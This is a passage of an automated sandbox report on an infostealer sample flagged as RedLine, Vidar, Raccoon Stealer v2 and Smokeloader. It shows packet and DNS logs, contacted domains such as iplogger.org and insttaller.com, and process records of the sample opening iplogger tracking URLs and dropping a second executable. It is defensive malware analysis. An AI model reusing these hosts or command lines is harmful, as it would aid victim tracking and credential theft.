Aug 23, 2022 03:43:41.978883028 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978898048 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978914022 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978930950 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978949070 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978965998 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978981972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.978998899 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979015112 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979032040 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979048014 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979064941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979084015 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979099989 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979118109 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979136944 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979154110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979171038 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979187012 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979203939 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979222059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979242086 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979258060 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979275942 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979291916 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979307890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979324102 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979341030 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979383945 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979403019 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979418993 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979435921 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979454994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979471922 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979489088 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979507923 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979525089 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979540110 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979556084 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979573011 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979590893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979608059 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979624033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979640961 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979656935 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979672909 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979690075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979706049 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979722023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979738951 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979756117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979772091 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979784966 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979801893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979818106 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979835033 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979852915 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979868889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979885101 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979901075 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979918003 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979933977 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979952097 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979968071 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.979984999 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980001926 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980017900 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980036020 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980051994 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980068922 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980084896 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980108023 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980125904 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980142117 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980159044 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980175972 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980191946 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980207920 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980223894 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980238914 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980254889 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980272055 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980288982 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980305910 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980321884 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980339050 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980360031 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980380058 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980398893 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980417013 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980433941 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980451107 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980468988 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980484962 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980501890 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980518103 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980534077 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980551004 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980567932 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980585098 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980601072 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980617046 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980633974 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.980650902 CEST	443	64969	142.250.184.42	192.168.2.3
Aug 23, 2022 03:43:41.981873035 CEST	64969	443	192.168.2.3	142.250.184.42

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 23, 2022 03:42:33.262109041 CEST	192.168.2.3	8.8.8.8	0xc3e8	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:33.263854027 CEST	192.168.2.3	8.8.8.8	0x4fb6	Standard query (0)	accounts.google.com	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:33.266056061 CEST	192.168.2.3	8.8.8.8	0x615e	Standard query (0)	clients2.google.com	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:36.007164955 CEST	192.168.2.3	8.8.8.8	0x297d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:36.307853937 CEST	192.168.2.3	8.8.8.8	0x5f0d	Standard query (0)	iplogger.org	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:36.569544077 CEST	192.168.2.3	8.8.8.8	0xaedf	Standard query (0)	dns.google	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:57.585952997 CEST	192.168.2.3	8.8.8.8	0x1f72	Standard query (0)	t.me	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:54.164926052 CEST	192.168.2.3	8.8.8.8	0x4e7	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:59.130882978 CEST	192.168.2.3	8.8.8.8	0x963	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)
Aug 23, 2022 03:44:36.124130011 CEST	192.168.2.3	8.8.8.8	0xd213	Standard query (0)	dns.google	A (IP address)	IN (0x0001)
Aug 23, 2022 03:45:32.137269020 CEST	192.168.2.3	8.8.8.8	0x8d5f	Standard query (0)	insttaller.com	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:26.860421896 CEST	192.168.2.3	8.8.8.8	0xc9b	Standard query (0)	dns.google	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.777081013 CEST	192.168.2.3	8.8.8.8	0x64a	Standard query (0)	cutt.ly	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.964529037 CEST	192.168.2.3	8.8.8.8	0x5371	Standard query (0)	cdn.discordapp.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Aug 23, 2022 03:42:33.279366016 CEST	8.8.8.8	192.168.2.3	0xc3e8	No error (0)	iplogger.org		148.251.234.83	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:33.289298058 CEST	8.8.8.8	192.168.2.3	0x4fb6	No error (0)	accounts.google.com		142.250.180.141	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:33.293051004 CEST	8.8.8.8	192.168.2.3	0x615e	No error (0)	clients2.google.com	clients.l.google.com		CNAME (Canonical name)	IN (0x0001)
Aug 23, 2022 03:42:33.293051004 CEST	8.8.8.8	192.168.2.3	0x615e	No error (0)	clients.l.google.com		142.251.209.46	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:36.025856018 CEST	8.8.8.8	192.168.2.3	0x297d	No error (0)	www.google.com		142.251.209.4	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:36.326616049 CEST	8.8.8.8	192.168.2.3	0x5f0d	No error (0)	iplogger.org		148.251.234.83	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:36.587903976 CEST	8.8.8.8	192.168.2.3	0xaedf	No error (0)	dns.google		8.8.4.4	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:36.587903976 CEST	8.8.8.8	192.168.2.3	0xaedf	No error (0)	dns.google		8.8.8.8	A (IP address)	IN (0x0001)
Aug 23, 2022 03:42:57.603174925 CEST	8.8.8.8	192.168.2.3	0x1f72	No error (0)	t.me		149.154.167.99	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:54.182233095 CEST	8.8.8.8	192.168.2.3	0x4e7	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:54.182233095 CEST	8.8.8.8	192.168.2.3	0x4e7	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:54.182233095 CEST	8.8.8.8	192.168.2.3	0x4e7	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:59.151957035 CEST	8.8.8.8	192.168.2.3	0x963	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:59.151957035 CEST	8.8.8.8	192.168.2.3	0x963	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:59.151957035 CEST	8.8.8.8	192.168.2.3	0x963	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:59.151957035 CEST	8.8.8.8	192.168.2.3	0x963	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Aug 23, 2022 03:43:59.151957035 CEST	8.8.8.8	192.168.2.3	0x963	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Aug 23, 2022 03:44:36.142731905 CEST	8.8.8.8	192.168.2.3	0xd213	No error (0)	dns.google		8.8.8.8	A (IP address)	IN (0x0001)
Aug 23, 2022 03:44:36.142731905 CEST	8.8.8.8	192.168.2.3	0xd213	No error (0)	dns.google		8.8.4.4	A (IP address)	IN (0x0001)
Aug 23, 2022 03:45:32.188831091 CEST	8.8.8.8	192.168.2.3	0x8d5f	No error (0)	insttaller.com		185.191.229.101	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:26.878976107 CEST	8.8.8.8	192.168.2.3	0xc9b	No error (0)	dns.google		8.8.4.4	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:26.878976107 CEST	8.8.8.8	192.168.2.3	0xc9b	No error (0)	dns.google		8.8.8.8	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.795960903 CEST	8.8.8.8	192.168.2.3	0x64a	No error (0)	cutt.ly		104.22.1.232	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.795960903 CEST	8.8.8.8	192.168.2.3	0x64a	No error (0)	cutt.ly		172.67.8.238	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.795960903 CEST	8.8.8.8	192.168.2.3	0x64a	No error (0)	cutt.ly		104.22.0.232	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.985915899 CEST	8.8.8.8	192.168.2.3	0x5371	No error (0)	cdn.discordapp.com		162.159.133.233	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.985915899 CEST	8.8.8.8	192.168.2.3	0x5371	No error (0)	cdn.discordapp.com		162.159.134.233	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.985915899 CEST	8.8.8.8	192.168.2.3	0x5371	No error (0)	cdn.discordapp.com		162.159.130.233	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.985915899 CEST	8.8.8.8	192.168.2.3	0x5371	No error (0)	cdn.discordapp.com		162.159.135.233	A (IP address)	IN (0x0001)
Aug 23, 2022 03:46:58.985915899 CEST	8.8.8.8	192.168.2.3	0x5371	No error (0)	cdn.discordapp.com		162.159.129.233	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

45.95.11.158

135.181.104.248

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: WSkT8d093C.exePID: 6016, Parent PID: 5360

General

Target ID:	1
Start time:	03:42:11
Start date:	23/08/2022
Path:	C:\Users\user\Desktop\WSkT8d093C.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\WSkT8d093C.exe"
Imagebase:	0x400000
File size:	2772338 bytes
MD5 hash:	E0118AD4299455683D5D0708772742EF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_3d9371fd, Description: unknown, Source: 00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000003.272716591.0000000003A60000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4872, Parent PID: 6016

General

Target ID:	3
Start time:	03:42:21
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AEmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 4688, Parent PID: 6016

General

Target ID:	4
Start time:	03:42:22
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1ARmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5312, Parent PID: 6016

General

Target ID:	6
Start time:	03:42:24
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AAmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 628, Parent PID: 6016

General

Target ID:	7
Start time:	03:42:26
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AFmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 3232, Parent PID: 4872

General

Target ID:	8
Start time:	03:42:30
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1980 --field-trial-handle=1812,i,13899178159324565324,4792733320013674352,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 768, Parent PID: 5312

General

Target ID:	10
Start time:	03:42:30
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1524 --field-trial-handle=1804,i,679818058755035571,9795757180626975896,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6180, Parent PID: 4688

General

Target ID:	11
Start time:	03:42:31
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1656 --field-trial-handle=1804,i,3887364631266855012,4134038574894975067,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6188, Parent PID: 6016

General

Target ID:	12
Start time:	03:42:31
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AGmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 6476, Parent PID: 6016

General

Target ID:	14
Start time:	03:42:35
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AJmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 5788, Parent PID: 6016

General

Target ID:	15
Start time:	03:42:36
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AKmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7184, Parent PID: 628

General

Target ID:	16
Start time:	03:42:37
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1960 --field-trial-handle=1816,i,10820754821841865939,13631308242641258792,131072 /prefetch:8
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7340, Parent PID: 6016

General

Target ID:	17
Start time:	03:42:37
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AZmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 7508, Parent PID: 6016

General

Target ID:	18
Start time:	03:42:38
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://iplogger.org/1AVmX4
Imagebase:	0x7ff614650000
File size:	2851656 bytes
MD5 hash:	0FEC2748F363150DC54C1CAFFB1A9408
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: F0geI.exePID: 7776, Parent PID: 6016

General

Target ID:	20
Start time:	03:42:39
Start date:	23/08/2022
Path:	C:\Program Files (x86)\Company\NewProduct\F0geI.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Company\NewProduct\F0geI.exe"
Imagebase:	0x400000
File size:	347136 bytes
MD5 hash:	501E0F6FA90340E3D7FF26F276CD582E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.443247307.00000000004E8000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.362733607.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.327739164.00000000005D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.369772118.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000002.449217008.000000000050B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.334532236.000000000054D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000002.439745303.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.333075740.0000000000523000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.346306423.0000000000521000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.382819718.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.368157732.000000000051E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000002.442092105.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000014.00000002.442092105.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.333063165.0000000000517000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.360540349.0000000000520000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RaccoonV2, Description: Yara detected Raccoon Stealer v2, Source: 00000014.00000003.334542606.0000000000523000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 64%, Metadefender, Browse Detection: 96%, ReversingLabs

Show Windows behavior

Chronological Activities

Analysis Process: chrome.exePID: 8076, Parent PID: 6188

General

Target ID:	21
Start time:	03:42:40
Start date:	23/08/2022
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
